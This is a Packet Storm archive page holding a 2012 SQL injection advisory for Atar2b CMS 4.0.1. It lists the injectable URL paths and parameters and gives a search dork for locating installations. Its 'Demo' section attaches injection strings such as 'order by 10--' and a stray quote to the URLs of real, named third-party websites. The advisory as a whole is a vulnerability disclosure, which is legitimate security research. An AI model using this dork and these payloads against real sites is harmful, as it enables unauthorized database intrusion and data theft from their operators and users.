exploit the possibilities

Atar2b CMS 4.0.1 SQL Injection

Atar2b CMS 4.0.1 SQL Injection
Posted Jan 7, 2012
Authored by Net.Edit0r, BHG Security Center, G3n3Rall

Atar2b CMS version 4.0.1 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 06205c4ee3f7a7dadcb5f4f6362acd49

Atar2b CMS 4.0.1 SQL Injection

Change Mirror Download
# Exploit Title: Atar2b Cms SQL Injection Vulnerability
# Date: 2012-01-06 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.atar2b.co.il/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:"Atar2b ????? ?????? ?????"
# Version : [4.0.1]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
- Net.Edit0r (Net.edit0r [at] att [dot] net)
- G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)

-----------------------------------------------------------------------------------------
Atar2b Israel Cms SQL Injection Vulnerability
-----------------------------------------------------------------------------------------

Author : BHG Security Center
Date : 2012-01-06
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------

PoC/Exploit:
~~~~~~~~~~

~ [PoC] ~: /website_path/pageE.php?id=[SQLi]

~ [PoC] ~: /website_path/gallery_e.php?id=[SQLi]

~ [PoC] ~: /website_path/pageH.php?id=[SQLi]

~~~~~~~~ Exploit

~ [PoC] ~: Http://[victim]/path/pageE.php?id=[SQLi]

~ [PoC] ~: Http://[victim]/path/gallery_e.php?id=[SQLi]

Demo:
~~~~~~~~~

http://www.vertexhome.co.il/gallery_e.php?id=118+order+by+10--

http://www.vertexhome.co.il/pageE.php?id=118+order+by+10--

http://www.clil.co.il/pageH.php?id=104'

Timeline:
~~~~~~~~~
- 02 - 01 - 2012 bug found.
- 03 - 01 - 2012 vendor contacted, but no response.
- 06 - 01 - 2012 Advisories release.

Important Notes:
~~~~~~~~~

- Vendor did not respond to the email as well as the phone. As there
is not any contact form or email address in

- the website, we have used all the emails which had been found by
searching in Google such as support, info, and so on.

---------------------------------------------------------------------------
Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | Mr.XHat |NoL1m1t |Bl4ck.Viper

Spical Th4nks: B3hz4d | ArYaIeIrAN| _SENATOR_ |Cyber C0der And All My Friendz

[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ
-------------------------------- [ EOF ] ----------------------------------

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    14 Files
  • 20
    Sep 20th
    20 Files
  • 21
    Sep 21st
    3 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close